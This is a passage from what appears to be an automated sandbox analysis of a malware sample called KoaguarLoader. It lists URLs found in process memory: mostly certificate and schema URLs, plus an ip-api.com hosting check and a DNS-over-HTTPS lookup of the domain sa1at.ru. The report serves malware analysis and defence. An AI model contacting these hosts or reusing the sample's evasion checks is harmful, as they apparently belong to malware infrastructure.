0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 
0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl00
                        Source: svchost.exe, 0000000F.00000003.1211505121.000001CB6D570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000255C000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001CA2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024F4000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BA7000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crtGlobalSign
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002492000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B78000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0
                        Source: KoaguarLoader.exe, 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000005.00000002.1032821832.000002B0CAEA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1159859244.000002226AE23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yak
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002492000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B78000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yak0%
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yakhttp://i.pki.goog/we1.crt
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yaks
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0Q
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comDigiCert
                        Source: powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000276C000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002528000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D5C000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018A8000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B5C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C60000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001F12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000275E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D50000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B5C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EFE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                        Source: KoaguarLoader.exe, 00000002.00000003.938189244.0000000001AE2000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.938216439.0000000001AF4000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.938305183.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.938239446.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.944038245.0000000001AFB000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.937986127.0000000001AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                        Source: powershell.exe, 00000005.00000002.1005496636.000002B0BB059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: svhost.exe, 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1005496636.000002B0BAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225ADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E45FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1005496636.000002B0BB059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B44000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002526000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018DC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D5E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EC8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                        Source: HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.orgChambers
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002550000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D0E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C7A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2129024902.0000000000291000.00000040.00000001.01000000.00000009.sdmp, I1y524I4zau1n3u.exe, 00000017.00000001.1289075938.0000000000291000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://1.1.1.1/dns-query?name=failed
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1.1.1.1/dns-query?name=sa1at.ru
